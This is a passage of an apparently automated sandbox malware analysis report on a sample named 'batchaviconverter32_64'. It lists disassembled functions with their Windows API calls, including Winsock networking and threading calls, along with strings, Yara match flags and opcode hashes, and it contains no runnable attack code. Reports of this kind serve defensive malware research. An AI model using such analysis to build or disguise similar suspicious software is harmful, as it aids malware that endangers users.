                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                              • String ID: Unknown error$invalid string position
                                                              • API String ID: 1854462395-1837348584
                                                              • Opcode ID: e13f668d4f9f7bad4d29535000be68f3307b971f34ad0a5c44839a26944ba5d3
                                                              • Instruction ID: ee4fd50d547342bcfa77f73db29cc84e385690bd9c420c23bccd0ec2eb16aab7
                                                              • Opcode Fuzzy Hash: e13f668d4f9f7bad4d29535000be68f3307b971f34ad0a5c44839a26944ba5d3
                                                              • Instruction Fuzzy Hash: 84519A70608341EFEB14DF25C890B2EBBE5EB98709F54092DF48297791D771E948CBA2
                                                              Function 02D82B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D82BE4
                                                              • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D82C07
                                                                • Part of subcall function 02D8A43B: WSAGetLastError.WS2_32(00000000,?,?,02D82A51), ref: 02D8A449
                                                              • WSASetLastError.WS2_32 ref: 02D82CD3
                                                              • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D82CE7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$Recvselect
                                                              • String ID: 3'
                                                              • API String ID: 886190287-280543908
                                                              • Opcode ID: 8e92bb30089ab221dd6b7ccf3262456599784acacb9c27b1a9a84ecdef239fd6
                                                              • Instruction ID: c7b0900eae56fff3b1c28b8541c499ccd3df6bb6e50bead2337fdf471b1c1ab5
                                                              • Opcode Fuzzy Hash: 8e92bb30089ab221dd6b7ccf3262456599784acacb9c27b1a9a84ecdef239fd6
                                                              • Instruction Fuzzy Hash: A4415CB19093419FDB10AF64D408BABBBE9EF84755F10491EE8D987380EB70DD45CBA2
                                                              Function 004038A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersionExA.KERNEL32 ref: 004038C7
                                                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004038FC
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040395C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileModuleNameVariableVersion
                                                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                              • API String ID: 1385375860-4131005785
                                                              • Opcode ID: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                              • Instruction ID: dfbe321087950a958f1f5ebe55e663b38e75b845a74228cdfb1d658b51cb0ff2
                                                              • Opcode Fuzzy Hash: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                              • Instruction Fuzzy Hash: A53127B29052446DEB319A705C46BDF3F6C9B02305F2400FBD185F52C2D2B99F85CB18
                                                              Function 02D91860 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • std::exception::exception.LIBCMT ref: 02D918AF
                                                                • Part of subcall function 02D92403: std::exception::_Copy_str.LIBCMT ref: 02D9241C
                                                                • Part of subcall function 02D90C80: __CxxThrowException@8.LIBCMT ref: 02D90CDE
                                                              • std::exception::exception.LIBCMT ref: 02D9190E
                                                              Strings
                                                              • boost unique_lock owns already the mutex, xrefs: 02D918FD
                                                              • $, xrefs: 02D91913
                                                              • boost unique_lock has no mutex, xrefs: 02D9189E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                              • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                              • API String ID: 2140441600-46888669
                                                              • Opcode ID: 5e6cb96de3b0781220d006198e361d42add2b0a027fa776d38ff22a0840a20b1
                                                              • Instruction ID: afdcbb08412c3f5126371492b63b499f22b6ed7c66c54f39281566ba8085c1f6
                                                              • Opcode Fuzzy Hash: 5e6cb96de3b0781220d006198e361d42add2b0a027fa776d38ff22a0840a20b1
                                                              • Instruction Fuzzy Hash: AE21D3B15083809FDB50DF24C554B5BBBE5BB89708F508A5EF8A587380D7B5D808CF96
                                                              Function 02D949AC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __getptd_noexit.LIBCMT ref: 02D949B0
                                                                • Part of subcall function 02D95BA2: GetLastError.KERNEL32(75920A60,7591F550,02D95D90,02D92F63,7591F550,?,02D8606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02D86504), ref: 02D95BA4
                                                                • Part of subcall function 02D95BA2: __calloc_crt.LIBCMT ref: 02D95BC5
                                                                • Part of subcall function 02D95BA2: __initptd.LIBCMT ref: 02D95BE7
                                                                • Part of subcall function 02D95BA2: GetCurrentThreadId.KERNEL32 ref: 02D95BEE
                                                                • Part of subcall function 02D95BA2: SetLastError.KERNEL32(00000000,02D8606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02D86504), ref: 02D95C06
                                                              • __calloc_crt.LIBCMT ref: 02D949D3
                                                              • __get_sys_err_msg.LIBCMT ref: 02D949F1
                                                              • __invoke_watson.LIBCMT ref: 02D94A0E
                                                              Strings
                                                              • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02D949BB, 02D949E1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                              • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                              • API String ID: 109275364-798102604
                                                              • Opcode ID: aead267925576d7359b1a096fd03f8c644d08b5af813431e472057a3bb1c8570
                                                              • Instruction ID: ee40a7b43f06660ca1292261517f86c0a3284ddd01f430a366d145d8775c11ad
                                                              • Opcode Fuzzy Hash: aead267925576d7359b1a096fd03f8c644d08b5af813431e472057a3bb1c8570
                                                              • Instruction Fuzzy Hash: A4F0E9366047147FEF22A65B5C41A2B72CDEB41BA4F00052AFD85D6302E721DD0286A5
                                                              Function 02D82341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                              • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                              • GetLastError.KERNEL32 ref: 02D8237A
                                                                • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                              • String ID: pqcs
                                                              • API String ID: 1619523792-2559862021
                                                              • Opcode ID: 4dbf7d877c3fa30827740e7450db22bd2813639bd42bc25ef447f0b2ad5f44a8
                                                              • Instruction ID: bd36734b18f9523825667d96fd11a521e258fef8aee38e37d32e4cd7440092c2
                                                              • Opcode Fuzzy Hash: 4dbf7d877c3fa30827740e7450db22bd2813639bd42bc25ef447f0b2ad5f44a8
                                                              • Instruction Fuzzy Hash: DEF0BD71940304ABEB10AAB4D819FAFB7BCEB45701F104569E949D2240E770DD148BA5
                                                              Function 02D84030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D84035
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02D84042
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02D84049
                                                              • std::exception::exception.LIBCMT ref: 02D84063
                                                                • Part of subcall function 02D8A5FC: __EH_prolog.LIBCMT ref: 02D8A601
                                                                • Part of subcall function 02D8A5FC: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A610
                                                                • Part of subcall function 02D8A5FC: __CxxThrowException@8.LIBCMT ref: 02D8A62F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                              • String ID: bad allocation
                                                              • API String ID: 3112922283-2104205924
                                                              • Opcode ID: 0b2dd333b3dcfe307265fb21cc6c2729e96b86946b2612435f326a52212cc303
                                                              • Instruction ID: 979f1202fcc41505085bfa89b1d6d78b5a65f1913d499b5a41a8dcde4efe56c9
                                                              • Opcode Fuzzy Hash: 0b2dd333b3dcfe307265fb21cc6c2729e96b86946b2612435f326a52212cc303
                                                              • Instruction Fuzzy Hash: 44F012B2D44209EBDB00EFE0D919FAFB779FB04301F504555E915A2340D7755A14CF65
                                                              Function 004036D0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403729
                                                              • GetFileType.KERNEL32(00000800), ref: 004037CF
                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 00403828
                                                              • GetFileType.KERNEL32(00000000), ref: 00403836
                                                              • SetHandleCount.KERNEL32 ref: 0040386D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: FileHandleType$CountInfoStartup
                                                              • String ID:
                                                              • API String ID: 1710529072-0
                                                              • Opcode ID: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                              • Instruction ID: 340931fb5571d0dd89e9413526c141aa1936fc067e7847d678db743c6b9c99aa
                                                              • Opcode Fuzzy Hash: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                              • Instruction Fuzzy Hash: A65136B25003508BD7209F28CD48B563FE8EB01336F19C67AE492EB2E1C738C955C75A
                                                              Function 02D91BB0 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02D91980: CloseHandle.KERNEL32(00000000,29E2DDE5), ref: 02D919D1
                                                                • Part of subcall function 02D91980: WaitForSingleObject.KERNEL32(?,000000FF,29E2DDE5,?,?,?,?,29E2DDE5,02D91953,29E2DDE5), ref: 02D919E8
                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D91C4E
                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D91C6E
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02D91CA7
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02D91CFB
                                                              • SetEvent.KERNEL32(?), ref: 02D91D02
                                                                • Part of subcall function 02D8418C: CloseHandle.KERNEL32(00000000,?,02D91C35), ref: 02D841B0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                              • String ID:
                                                              • API String ID: 4166353394-0
                                                              • Opcode ID: fd3425c2097f602f6c2d96ef4d649a1f5846eda2b55b99f5a8767898373e1a76
                                                              • Instruction ID: 0364cfb9c5dacf6920dee3252a2bb5db8bf702d9506b5bb9cb002a82cc7677ce
                                                              • Opcode Fuzzy Hash: fd3425c2097f602f6c2d96ef4d649a1f5846eda2b55b99f5a8767898373e1a76
                                                              • Instruction Fuzzy Hash: 5241BC71A013029BEF259F28DC80B2AB7A4EF45725F1406A8FC19EB395D735DC11CBA5
                                                              Function 02D8E02A Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8E02F
                                                                • Part of subcall function 02D81A01: TlsGetValue.KERNEL32 ref: 02D81A0A
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D8E0AE
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D8E0CA
                                                              • InterlockedIncrement.KERNEL32(02DB5180), ref: 02D8E0EF
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D8E104
                                                                • Part of subcall function 02D827F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D8284E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                              • String ID:
                                                              • API String ID: 1578506061-0
                                                              • Opcode ID: f92efe1083cbe2b826f4277ab4d77bdd6178c19008db69612abe4c07a2b16b5a
                                                              • Instruction ID: d2611051b7fb5ed18e3c6730a3a0f130791aff1fd81e9dfde6be1742c037b922
                                                              • Opcode Fuzzy Hash: f92efe1083cbe2b826f4277ab4d77bdd6178c19008db69612abe4c07a2b16b5a
                                                              • Instruction Fuzzy Hash: 543116B1D052059FDB10EFA9D544AAEBBF8FF08310F14495AE849D7740E775AA04CFA0
                                                              Function 02D829EE Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D82A3B
                                                              • closesocket.WS2_32 ref: 02D82A42
                                                              • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D82A89
                                                              • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D82A97
                                                              • closesocket.WS2_32 ref: 02D82A9E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastclosesocket$ioctlsocket
                                                              • String ID:
                                                              • API String ID: 1561005644-0
                                                              • Opcode ID: f8b43a1b1104fe7db6572917ae975bd8e9823b80ab71291453f95e02bc61b870
                                                              • Instruction ID: ec47630055d2ae4b2408a6e83cb80cec642b23b2a11012b964775bf971bf03bc
                                                              • Opcode Fuzzy Hash: f8b43a1b1104fe7db6572917ae975bd8e9823b80ab71291453f95e02bc61b870
                                                              • Instruction Fuzzy Hash: 962106B5A04245ABEB20BBB8984CB6EB7E9DF44315F11456AEC06D3380EB70CD41CBA1
                                                              Function 02D81BA7 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D81BAC
                                                              • RtlEnterCriticalSection.NTDLL ref: 02D81BBC
                                                              • RtlLeaveCriticalSection.NTDLL ref: 02D81BEA
                                                              • RtlEnterCriticalSection.NTDLL ref: 02D81C13
                                                              • RtlLeaveCriticalSection.NTDLL ref: 02D81C56
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$H_prolog
                                                              • String ID:
                                                              • API String ID: 1633115879-0
                                                              • Opcode ID: faa9f9035bbf23af688ca3a72f4a817a3f647c5e4da236ea439ac27c7febc672
                                                              • Instruction ID: e9ff18df7ae63c50a2aaac6b2419ea1a90e3f2e10084f00407040c71423ba734
                                                              • Opcode Fuzzy Hash: faa9f9035bbf23af688ca3a72f4a817a3f647c5e4da236ea439ac27c7febc672
                                                              • Instruction Fuzzy Hash: CC218BB5A00214DFDB14DF68C444B9AFBB5FF49714F208589E85997301D774ED0ACBA0
                                                              Function 02DA02E4 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _malloc.LIBCMT ref: 02DA02F0
                                                                • Part of subcall function 02D92EDC: __FF_MSGBANNER.LIBCMT ref: 02D92EF3
                                                                • Part of subcall function 02D92EDC: __NMSG_WRITE.LIBCMT ref: 02D92EFA
                                                                • Part of subcall function 02D92EDC: RtlAllocateHeap.NTDLL(00730000,00000000,00000001), ref: 02D92F1F
                                                              • _free.LIBCMT ref: 02DA0303
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap_free_malloc
                                                              • String ID:
                                                              • API String ID: 1020059152-0
                                                              • Opcode ID: 76aa4bca27ed6bd9a3225e01b065689d2ae20725fd11b4082dfeea10b15ae0af
                                                              • Instruction ID: 771ed6986718801212dc29418df03864d31f06f2de8d1c95949fc6e41b4bc060
                                                              • Opcode Fuzzy Hash: 76aa4bca27ed6bd9a3225e01b065689d2ae20725fd11b4082dfeea10b15ae0af
                                                              • Instruction Fuzzy Hash: 35110632909615EFDF213F74B868F5A3799DF05362F104529FA899A390DB30DC50CAE4
                                                              Function 02D821D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D821DA
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D821ED
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D82224
                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D82237
                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D82261
                                                                • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                                • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                                • Part of subcall function 02D82341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                                • Part of subcall function 02D82341: GetLastError.KERNEL32 ref: 02D8237A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 1856819132-0
                                                              • Opcode ID: ca37b8d0cb1544dcbf8058c8d56962946ad568fd0cf975207385f1704a91680f
                                                              • Instruction ID: 77d7ff6edf5fdf463c8e3b191d7162d606b7ce4ae13b775bfeb0db60e0f2d7ca
                                                              • Opcode Fuzzy Hash: ca37b8d0cb1544dcbf8058c8d56962946ad568fd0cf975207385f1704a91680f
                                                              • Instruction Fuzzy Hash: 5F118172D04154DBDB01AFA4D808AAEFBBAFF44310F10851AE855A2360D7714E51DB91
                                                              Function 02D82298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8229D
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D822B0
                                                              • TlsGetValue.KERNEL32 ref: 02D822E7
                                                              • TlsSetValue.KERNEL32(?), ref: 02D82300
                                                              • TlsSetValue.KERNEL32(?,?,?), ref: 02D8231C
                                                                • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                                • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                                • Part of subcall function 02D82341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                                • Part of subcall function 02D82341: GetLastError.KERNEL32 ref: 02D8237A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 1856819132-0
                                                              • Opcode ID: e6c2e0c0412b497509c4e5ed3de713abea6084867dad4979f634d21db72e11e4
                                                              • Instruction ID: 2ff7f2a518db1d6c5c3116551b7b9028c7ebe0a213fd4ae3919ab1c68c54e418
                                                              • Opcode Fuzzy Hash: e6c2e0c0412b497509c4e5ed3de713abea6084867dad4979f634d21db72e11e4
                                                              • Instruction Fuzzy Hash: 5A116072D10118EBDB02AFA4D814AAEFFBAFF54310F10451AE805A3350D7714D51DF90
                                                              Function 02D8BC44 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02D8B097: __EH_prolog.LIBCMT ref: 02D8B09C
                                                              • __CxxThrowException@8.LIBCMT ref: 02D8BC61
                                                                • Part of subcall function 02D9448A: RaiseException.KERNEL32(?,?,02D8FA91,?,?,?,?,?,?,?,02D8FA91,?,02DB0F88,?), ref: 02D944DF
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02DB1DA4,?,00000001), ref: 02D8BC77
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D8BC8A
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02DB1DA4,?,00000001), ref: 02D8BC9A
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D8BCA8
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                              • String ID:
                                                              • API String ID: 2725315915-0
                                                              • Opcode ID: bba6eeb7e625f9c961ad69e1e783fd5e35437dfbbc5b317781357c98dd6d7d04
                                                              • Instruction ID: 09e45b050dd1cb3740f02f177fc4638d90b0e0279841d654a15b5f570176bf3e
                                                              • Opcode Fuzzy Hash: bba6eeb7e625f9c961ad69e1e783fd5e35437dfbbc5b317781357c98dd6d7d04
                                                              • Instruction Fuzzy Hash: C00181B2A40304AFEB10AEB4DC89F9BB7BDEB04759F104915F625D7390DBA0EC058B60
                                                              Function 02D82420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D82432
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D82445
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D82454
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82469
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D82470
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 747265849-0
                                                              • Opcode ID: 90ceb651a779b50b60fc13977600b86d49d599875299424682a262be7f06c083
                                                              • Instruction ID: a1b0676cf97954e4b9beb8833b21adccc8f831324822ec4dbc960ad8fa14ed44
                                                              • Opcode Fuzzy Hash: 90ceb651a779b50b60fc13977600b86d49d599875299424682a262be7f06c083
                                                              • Instruction Fuzzy Hash: 68F01D72641204BFE700AAA5ED4AFDAB72CFB44711FA04811F601D6680D761AD20CBB5
                                                              Function 02D81EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedIncrement.KERNEL32(?), ref: 02D81ED2
                                                              • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D81EEA
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D81EF9
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D81F0E
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D81F15
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 830998967-0
                                                              • Opcode ID: 99d2522600ff2859bb70b6c291b29f99637a578cabbecc939ec9f0c535df3e2e
                                                              • Instruction ID: 789de55ff4e493a2dd59e91119654212bd5ff4034273801a00d5a4e33f77dbad
                                                              • Opcode Fuzzy Hash: 99d2522600ff2859bb70b6c291b29f99637a578cabbecc939ec9f0c535df3e2e
                                                              • Instruction Fuzzy Hash: 15F03A72641605BBE700AFA1ED89FDABB3CFF44341F100416F60186680D775E925CBE4
                                                              Function 02D88681 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: invalid string position$string too long
                                                              • API String ID: 4104443479-4289949731
                                                              • Opcode ID: a46836990606f4ddd4bb62811bfb7627ac44463cdc0bf67f36bdb490c76b14c7
                                                              • Instruction ID: 2c66b51208b2cfb6358906b1b23611dbaf05b23248d6a1a6f41e4116710549fd
                                                              • Opcode Fuzzy Hash: a46836990606f4ddd4bb62811bfb7627ac44463cdc0bf67f36bdb490c76b14c7
                                                              • Instruction Fuzzy Hash: 4F41A1313003489FDB24AE69DC84E6AB7BAEB41764B90092DE856CB781D770EC04DBA0
                                                              Function 02D830AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D830C3
                                                              • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D83102
